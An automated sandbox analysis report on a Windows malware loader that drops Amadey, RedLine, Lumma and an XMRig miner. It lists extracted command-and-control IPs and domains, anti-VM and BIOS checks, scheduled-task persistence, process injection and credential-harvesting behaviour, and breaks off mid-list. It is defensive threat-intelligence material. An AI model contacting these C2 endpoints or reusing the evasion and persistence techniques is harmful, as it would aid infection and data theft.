Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
23-06-2024 22:55
Static task
static1
General
-
Target
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
-
Size
1.8MB
-
MD5
4eef36b2c02ad8525ba1cfe7790dffbb
-
SHA1
446809be411edad4e9d44fc6633cda3c2e1920ec
-
SHA256
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044
-
SHA512
17e620916713ed5329e7f3895fcecfe2374cee0b2f079599f1e83f62d422fdcb0b03160a37f64415b7ebc2577014ed1999fda59c65e277ec030f368523bbbb98
-
SSDEEP
49152:3hY+1pbKJX0Sts3BGqlbVLQmLSHECH/DjzuwH3D:3hN1pbG0amGk3L2H/3zvH3D
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
AMA
185.215.113.67:40960
Extracted
redline
LiveTraffic
4.185.27.237:13528
Extracted
lumma
https://parallelmercywksoffw.shop/api
https://liabiliytshareodlkv.shop/api
https://notoriousdcellkw.shop/api
https://conferencefreckewl.shop/api
https://flourhishdiscovrw.shop/api
https://landdumpycolorwskfw.shop/api
https://barebrilliancedkoso.shop/api
https://facilitycoursedw.shop/api
https://publicitycharetew.shop/api
https://computerexcudesp.shop/api
https://leafcalfconflcitw.shop/api
https://injurypiggyoewirog.shop/api
https://bargainnygroandjwk.shop/api
https://disappointcredisotw.shop/api
https://doughtdrillyksow.shop/api
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe family_redline behavioral1/memory/3136-41-0x0000000000B70000-0x0000000000BC0000-memory.dmp family_redline behavioral1/memory/4884-67-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral1/memory/5452-613-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-616-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-617-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-618-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-624-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-615-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-612-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-636-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5452-637-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 65 3648 powershell.exe 79 3648 powershell.exe 89 2528 powershell.exe 92 2528 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3648 powershell.exe 2528 powershell.exe 2320 powershell.exe 400 powershell.exe 3136 powershell.exe 5856 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplong.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Hkbsse.exeama.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeNewLatest.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation Hkbsse.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation ama.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation NewLatest.exe -
Executes dropped EXE 17 IoCs
Processes:
axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exe1.exeHkbsse.exeaxplong.exelegs.exeFirstZ.exetaskweaker.exe6.exereakuqnanrkn.exeaxplong.exeHkbsse.exepid process 3668 axplong.exe 3136 ama.exe 2388 gold.exe 2072 lummac2.exe 4152 NewLatest.exe 3420 Hkbsse.exe 884 Installer.exe 2752 1.exe 4740 Hkbsse.exe 2492 axplong.exe 3748 legs.exe 3152 FirstZ.exe 2124 taskweaker.exe 992 6.exe 5836 reakuqnanrkn.exe 6000 axplong.exe 5860 Hkbsse.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplong.exeaxplong.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine axplong.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/5452-609-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-610-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-613-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-616-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-617-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-618-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-624-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-615-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-612-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-611-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-608-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-607-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-636-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/5452-637-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Installer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Installer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 5388 powercfg.exe 5384 powercfg.exe 5380 powercfg.exe 5348 powercfg.exe 5488 powercfg.exe 5496 powercfg.exe 5512 powercfg.exe 5504 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exereakuqnanrkn.exeFirstZ.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe reakuqnanrkn.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exeaxplong.exepid process 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe 3668 axplong.exe 2492 axplong.exe 6000 axplong.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
gold.exelegs.exetaskweaker.exereakuqnanrkn.exedescription pid process target process PID 2388 set thread context of 4884 2388 gold.exe RegAsm.exe PID 3748 set thread context of 3128 3748 legs.exe RegAsm.exe PID 2124 set thread context of 6052 2124 taskweaker.exe BitLockerToGo.exe PID 5836 set thread context of 5364 5836 reakuqnanrkn.exe conhost.exe PID 5836 set thread context of 5452 5836 reakuqnanrkn.exe explorer.exe -
Drops file in Windows directory 2 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeNewLatest.exedescription ioc process File created C:\Windows\Tasks\axplong.job 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5696 sc.exe 2288 sc.exe 5748 sc.exe 5260 sc.exe 5520 sc.exe 992 sc.exe 5340 sc.exe 5348 sc.exe 5396 sc.exe 5440 sc.exe 5216 sc.exe 5220 sc.exe 5300 sc.exe 5756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2528 2752 WerFault.exe 1.exe 4668 3748 WerFault.exe legs.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exeexplorer.exemsedge.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636569952530472" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exepowershell.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{644AD728-25DA-489F-93C8-21460868F2B9} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3932 schtasks.exe 2560 schtasks.exe 5040 schtasks.exe 5000 schtasks.exe 3864 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeama.exepowershell.exeaxplong.exepowershell.exepowershell.exeRegAsm.exepowershell.exe6.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exepid process 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe 3668 axplong.exe 3668 axplong.exe 3136 ama.exe 3136 ama.exe 3648 powershell.exe 3648 powershell.exe 3648 powershell.exe 2492 axplong.exe 2492 axplong.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 3128 RegAsm.exe 2320 powershell.exe 2320 powershell.exe 2320 powershell.exe 3136 ama.exe 3136 ama.exe 992 6.exe 992 6.exe 3152 FirstZ.exe 3136 powershell.exe 3136 powershell.exe 3136 powershell.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 3152 FirstZ.exe 5836 reakuqnanrkn.exe 5856 powershell.exe 5856 powershell.exe 5856 powershell.exe 5836 reakuqnanrkn.exe 5836 reakuqnanrkn.exe 5836 reakuqnanrkn.exe 5836 reakuqnanrkn.exe 5836 reakuqnanrkn.exe 5836 reakuqnanrkn.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
ama.exepowershell.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3136 ama.exe Token: SeDebugPrivilege 3648 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 3128 RegAsm.exe Token: SeBackupPrivilege 3128 RegAsm.exe Token: SeSecurityPrivilege 3128 RegAsm.exe Token: SeSecurityPrivilege 3128 RegAsm.exe Token: SeSecurityPrivilege 3128 RegAsm.exe Token: SeSecurityPrivilege 3128 RegAsm.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeShutdownPrivilege 5488 powercfg.exe Token: SeCreatePagefilePrivilege 5488 powercfg.exe Token: SeShutdownPrivilege 5496 powercfg.exe Token: SeCreatePagefilePrivilege 5496 powercfg.exe Token: SeShutdownPrivilege 5504 powercfg.exe Token: SeCreatePagefilePrivilege 5504 powercfg.exe Token: SeShutdownPrivilege 5512 powercfg.exe Token: SeCreatePagefilePrivilege 5512 powercfg.exe Token: SeDebugPrivilege 5856 powershell.exe Token: SeShutdownPrivilege 5380 powercfg.exe Token: SeCreatePagefilePrivilege 5380 powercfg.exe Token: SeShutdownPrivilege 5384 powercfg.exe Token: SeCreatePagefilePrivilege 5384 powercfg.exe Token: SeShutdownPrivilege 5388 powercfg.exe Token: SeCreatePagefilePrivilege 5388 powercfg.exe Token: SeLockMemoryPrivilege 5452 explorer.exe Token: SeShutdownPrivilege 5348 powercfg.exe Token: SeCreatePagefilePrivilege 5348 powercfg.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exemsedge.exepid process 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe 2136 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exeHkbsse.exepowershell.execmd.exelegs.exedescription pid process target process PID 3468 wrote to memory of 3668 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe axplong.exe PID 3468 wrote to memory of 3668 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe axplong.exe PID 3468 wrote to memory of 3668 3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe axplong.exe PID 3668 wrote to memory of 3136 3668 axplong.exe ama.exe PID 3668 wrote to memory of 3136 3668 axplong.exe ama.exe PID 3668 wrote to memory of 3136 3668 axplong.exe ama.exe PID 3668 wrote to memory of 2388 3668 axplong.exe gold.exe PID 3668 wrote to memory of 2388 3668 axplong.exe gold.exe PID 3668 wrote to memory of 2388 3668 axplong.exe gold.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 2388 wrote to memory of 4884 2388 gold.exe RegAsm.exe PID 3668 wrote to memory of 2072 3668 axplong.exe lummac2.exe PID 3668 wrote to memory of 2072 3668 axplong.exe lummac2.exe PID 3668 wrote to memory of 2072 3668 axplong.exe lummac2.exe PID 3668 wrote to memory of 4152 3668 axplong.exe NewLatest.exe PID 3668 wrote to memory of 4152 3668 axplong.exe NewLatest.exe PID 3668 wrote to memory of 4152 3668 axplong.exe NewLatest.exe PID 4152 wrote to memory of 3420 4152 NewLatest.exe Hkbsse.exe PID 4152 wrote to memory of 3420 4152 NewLatest.exe Hkbsse.exe PID 4152 wrote to memory of 3420 4152 NewLatest.exe Hkbsse.exe PID 3668 wrote to memory of 884 3668 axplong.exe Installer.exe PID 3668 wrote to memory of 884 3668 axplong.exe Installer.exe PID 884 wrote to memory of 3048 884 Installer.exe cmd.exe PID 884 wrote to memory of 3048 884 Installer.exe cmd.exe PID 3048 wrote to memory of 3932 3048 cmd.exe schtasks.exe PID 3048 wrote to memory of 3932 3048 cmd.exe schtasks.exe PID 3048 wrote to memory of 2560 3048 cmd.exe schtasks.exe PID 3048 wrote to memory of 2560 3048 cmd.exe schtasks.exe PID 3048 wrote to memory of 3648 3048 cmd.exe powershell.exe PID 3048 wrote to memory of 3648 3048 cmd.exe powershell.exe PID 3420 wrote to memory of 2752 3420 Hkbsse.exe 1.exe PID 3420 wrote to memory of 2752 3420 Hkbsse.exe 1.exe PID 3420 wrote to memory of 2752 3420 Hkbsse.exe 1.exe PID 3048 wrote to memory of 400 3048 cmd.exe powershell.exe PID 3048 wrote to memory of 400 3048 cmd.exe powershell.exe PID 400 wrote to memory of 2864 400 powershell.exe cmd.exe PID 400 wrote to memory of 2864 400 powershell.exe cmd.exe PID 3048 wrote to memory of 2528 3048 cmd.exe powershell.exe PID 3048 wrote to memory of 2528 3048 cmd.exe powershell.exe PID 2864 wrote to memory of 5040 2864 cmd.exe schtasks.exe PID 2864 wrote to memory of 5040 2864 cmd.exe schtasks.exe PID 2864 wrote to memory of 2492 2864 cmd.exe reg.exe PID 2864 wrote to memory of 2492 2864 cmd.exe reg.exe PID 2864 wrote to memory of 5000 2864 cmd.exe schtasks.exe PID 2864 wrote to memory of 5000 2864 cmd.exe schtasks.exe PID 2864 wrote to memory of 3864 2864 cmd.exe schtasks.exe PID 2864 wrote to memory of 3864 2864 cmd.exe schtasks.exe PID 3668 wrote to memory of 3748 3668 axplong.exe legs.exe PID 3668 wrote to memory of 3748 3668 axplong.exe legs.exe PID 3668 wrote to memory of 3748 3668 axplong.exe legs.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 